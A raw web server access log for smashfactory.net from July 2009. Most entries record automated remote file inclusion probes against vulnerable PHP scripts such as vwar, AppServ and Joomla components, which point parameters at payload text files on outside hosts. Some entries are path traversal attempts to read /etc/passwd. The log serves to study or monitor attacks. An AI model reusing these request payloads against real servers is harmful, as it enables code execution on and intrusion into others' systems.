121.124.127.34 - - [05/Jul/2009:02:59:47 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:02:59:47 -0700] "GET /appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:00:07 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:00:07 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:00:07 -0700] "GET //vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:00:57 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:00:57 -0700] "GET //vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:00:57 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:04:39 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.53.70.114 - - [05/Jul/2009:03:04:51 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:04:52 -0700] "GET /include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:04:52 -0700] "GET /include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:04:52 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:04:52 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:04:56 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:04:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
220.231.126.252 - - [05/Jul/2009:03:06:20 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
220.231.126.252 - - [05/Jul/2009:03:06:20 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
220.231.126.252 - - [05/Jul/2009:03:06:20 -0700] "GET //vwar/backup/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
217.125.38.117 - - [05/Jul/2009:03:08:35 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
220.231.126.252 - - [05/Jul/2009:03:08:51 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
220.231.126.252 - - [05/Jul/2009:03:08:52 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
220.231.126.252 - - [05/Jul/2009:03:08:52 -0700] "GET //vwar/backup/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
74.6.22.153 - - [05/Jul/2009:03:09:45 -0700] "GET /logs/access.log HTTP/1.0" 200 80075 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:03:12:25 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:03:12:25 -0700] "GET /appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:03:12:25 -0700] "GET /logs//appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:14:41 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:03:15:22 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [05/Jul/2009:03:31:55 -0700] "GET /logs/access_090129.log//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
201.232.54.48 - - [05/Jul/2009:03:31:55 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
201.232.54.48 - - [05/Jul/2009:03:31:55 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
208.80.195.42 - - [05/Jul/2009:03:35:30 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={37972090-6802-4b54-8369-1F1D901EF717}; Orange 7.4 ; NaviWoo1.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; HbTools 4.8.4)" "www.smashfactory.net"
218.158.98.196 - - [05/Jul/2009:03:35:53 -0700] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
94.229.66.202 - - [05/Jul/2009:03:37:50 -0700] "GET /logs/galeria.php?start=0&kategoria=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.smashfactory.net"
94.229.66.202 - - [05/Jul/2009:03:37:50 -0700] "GET /logs/access.log/galeria.php?start=0&kategoria=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.smashfactory.net"
94.229.66.202 - - [05/Jul/2009:03:37:50 -0700] "GET /galeria.php?start=0&kategoria=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.smashfactory.net"
89.171.190.110 - - [05/Jul/2009:03:39:27 -0700] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
217.125.38.117 - - [05/Jul/2009:03:41:36 -0700] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
94.229.66.202 - - [05/Jul/2009:03:43:30 -0700] "GET /galeria.php?start=0&kategoria=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.smashfactory.net"
200.58.119.65 - - [05/Jul/2009:03:47:57 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://highlandquebec.com/Templates/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
200.58.119.65 - - [05/Jul/2009:03:47:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://highlandquebec.com/Templates/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
200.58.119.65 - - [05/Jul/2009:03:49:42 -0700] "GET /logs/access.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://highlandquebec.com/Templates/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:05 -0700] "GET /logs/access_090129.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:06 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:06 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:06 -0700] "GET /logs/access_090129.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:06 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:25 -0700] "GET /logs/access_090129.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:25 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
204.9.247.53 - - [05/Jul/2009:04:00:26 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
38.103.63.62 - - [05/Jul/2009:04:07:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "smashfactory.net"